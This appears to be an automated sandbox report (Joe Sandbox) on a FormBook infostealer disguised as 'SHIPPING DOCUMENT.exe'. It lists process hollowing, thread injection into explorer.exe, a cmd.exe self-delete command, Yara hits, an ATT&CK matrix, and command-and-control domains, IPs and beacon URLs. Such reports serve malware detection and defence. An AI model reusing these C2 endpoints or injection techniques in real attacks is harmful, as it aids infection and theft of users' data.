          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]8_2_03981C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]8_2_03981C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]8_2_03981C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_100014EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_100014EE

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.barkinlot.com
          Source: C:\Windows\explorer.exeDomain query: www.buyruon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.151.79.234 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.union-green.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.220.41.208 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fuerzaagavera.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection loaded: unknown target: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: D60000Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.662030709.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.680444387.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Rootkit1Credential API Hooking1Security Software Discovery231Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 404217 Sample: SHIPPING DOCUMENT.exe Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 10 other signatures 2->44 10 SHIPPING DOCUMENT.exe 19 2->10         started        process3 file4 30 C:\Users\user\AppData\Local\...\2x6gdfzk.dll, PE32 10->30 dropped 56 Maps a DLL or memory area into another process 10->56 14 SHIPPING DOCUMENT.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 32 www.barkinlot.com 107.151.79.234, 49754, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK United States 17->32 34 www.union-green.com 154.220.41.208, 49766, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 17->34 36 4 other IPs or domains 17->36 46 System process connects to network (likely due to code injection or exploit) 17->46 48 Uses netstat to query active network connections and open ports 17->48 21 NETSTAT.EXE 17->21         started        24 autofmt.exe 17->24         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SHIPPING DOCUMENT.exe34%VirustotalBrowse
          SHIPPING DOCUMENT.exe45%ReversingLabsWin32.Trojan.Predator
          SHIPPING DOCUMENT.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll17%ReversingLabsWin32.Trojan.Jaik

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.1.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          8.2.NETSTAT.EXE.32de860.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          8.2.NETSTAT.EXE.3dcf834.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.barkinlot.com0%VirustotalBrowse
          www.union-green.com0%VirustotalBrowse
          www.fuerzaagavera.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.union-green.com/dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.yabovip1288.com0%Avira URL Cloudsafe
          www.knighttechinca.com/dxe/0%Avira URL Cloudsafe
          http://www.fuerzaagavera.com/dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.barkinlot.com/dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.buyruon.com/dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.barkinlot.com
          		107.151.79.234
          		truetrueunknown
          www.union-green.com
          		154.220.41.208
          		truetrueunknown
          www.fuerzaagavera.com
          		64.190.62.111
          		truetrueunknown
          buyruon.com
          		34.102.136.180
          		truefalse
            		unknown
            www.buyruon.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.union-green.com/dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7Jtrue
              • Avira URL Cloud: safe
              		unknown
              www.knighttechinca.com/dxe/true
              • Avira URL Cloud: safe
              		low
              http://www.fuerzaagavera.com/dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7Jtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.barkinlot.com/dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7Jtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.buyruon.com/dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7Jfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.tiro.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpfalse
                            		high
                            http://nsis.sf.net/NSIS_ErrorErrorSHIPPING DOCUMENT.exefalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.yabovip1288.comNETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorSHIPPING DOCUMENT.exefalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.%s.comPAexplorer.exe, 00000004.00000002.917278405.0000000002B50000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      http://www.fonts.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://hm.baidu.com/hm.js?2f7ed51008e649f38c9a7a932b01f7d5NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpfalse
                                          		high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          107.151.79.234
                                          		www.barkinlot.comUnited States
                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                          154.220.41.208
                                          		www.union-green.comSeychelles
                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                          34.102.136.180
                                          		buyruon.comUnited States
                                          		15169GOOGLEUSfalse
                                          64.190.62.111
                                          		www.fuerzaagavera.comUnited States
                                          		11696NBS11696UStrue

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:404217
                                          Start date:04.05.2021
                                          Start time:20:09:44
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 58s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:SHIPPING DOCUMENT.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:22
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@8/4@4/5
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 29% (good quality ratio 26.4%)
                                          • Quality average: 74.8%
                                          • Quality standard deviation: 31.1%
                                          HCA Information:
                                          • Successful, ratio: 90%
                                          • Number of executed functions: 102
                                          • Number of non-executed functions: 59
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          154.220.41.208REQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                          • www.union-green.com/dxe/?rL=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMLo2PMoXx0QTgunIdw==&2dqLWB=RXBtNzex
                                          64.190.62.111don.exeGet hashmaliciousBrowse
                                          • www.nouvellecartebancaire.com/uoe8/?Y4plXns=Nr6XIQb0LJy7g3BSKo+ydWEWOraq59KjgAXxyRNEYt403hVE3BM/4MFy9ZsB9HNXCzAN&BR=cjlpd
                                          DocNo2300058329.exeGet hashmaliciousBrowse
                                          • www.chandlerguo.com/ued5/?BR-d4N=7nMpkDO0IdLxFH6P&RL0=bezfYCf7hjYaP7aKm321naJfBhBryPc+PKIQpAm7WhkghlmEMQZYG8wsgYserUfX3+Mq
                                          APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exeGet hashmaliciousBrowse
                                          • www.fittogo.net/o86d/?2dqLW0=RXBPDPWx&Sh=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21zk7Okf9Jgd9
                                          VIKRAMQST21-222.exeGet hashmaliciousBrowse
                                          • www.fittogo.net/o86d/?-Z1l=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21wISNkjFADorID+xhg==&4h2=k2JX5d7XCd603LJP
                                          Bank Details Pdf.exeGet hashmaliciousBrowse
                                          • www.perfumebarbyparisine.com/ou59/?BR=chrxU&Vt=AgbchBVRB6f0q4bgYsoYiFpejO9RxmhiEQZzFQZe8IuCEkVt+YPwO8avVoDsOpMG+BSV
                                          Wire transfer.exeGet hashmaliciousBrowse
